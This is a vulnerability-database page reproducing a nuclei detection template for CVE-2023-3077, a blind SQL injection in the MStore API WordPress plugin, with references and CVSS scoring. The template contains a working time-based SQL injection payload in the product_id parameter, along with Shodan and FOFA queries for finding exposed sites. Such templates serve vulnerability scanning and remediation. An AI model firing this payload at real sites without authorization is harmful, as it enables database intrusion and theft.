Lucene search
K

MStore API < 3.9.8 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 54 Views

MStore API < 3.9.8 - SQL Injection, allows extraction of sensitive data, update to latest versio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin MStore API SQL注入漏洞
10 Jul 202300:00
cnnvd
CVE
CVE-2023-3077
10 Jul 202312:40
cve
Cvelist
CVE-2023-3077 MStore API < 3.9.8 - Unauthenticated Blind SQLi
10 Jul 202312:40
cvelist
NVD
CVE-2023-3077
10 Jul 202316:15
nvd
OSV
CVE-2023-3077
10 Jul 202316:15
osv
Prion
Sql injection
10 Jul 202316:15
prion
Positive Technologies
PT-2023-22967 · WordPress · Mstore Api +1
10 Jul 202300:00
ptsecurity
RedhatCVE
CVE-2023-3077
23 May 202502:12
redhatcve
Vulnrichment
CVE-2023-3077 MStore API < 3.9.8 - Unauthenticated Blind SQLi
10 Jul 202312:40
vulnrichment
Wordfence Blog
Wordfence Intelligence Weekly WordPress Vulnerability Report (June 19, 2023 to June 25, 2023)
29 Jun 202313:24
wordfence
Rows per page
id: CVE-2023-3077

info:
  name: MStore API < 3.9.8 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.
  impact: |
    Allows an attacker to extract sensitive data from the database
  remediation: |
    Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability
  reference:
    - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3077
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3077
    epss-score: 0.05304
    epss-percentile: 0.91579
    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: inspireui
    product: mstore_api
    framework: wordpress
    publicwww-query: "/wp-content/plugins/mstore-api/"
    shodan-query: http.html:/wp-content/plugins/mstore-api/
    fofa-query: body=/wp-content/plugins/mstore-api/
  tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "MStore API")'
        condition: and

  - raw:
      - |
        @timeout: 15s
        GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ae6c602043b3c38f5d0b088b634e415a6b704fd7724aa7cfa3bb71b020c83944022100876c07ff9d48213651a2f34a3765f973d2ceead7627e7619108bcd862134b133:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.05304
SSVC
54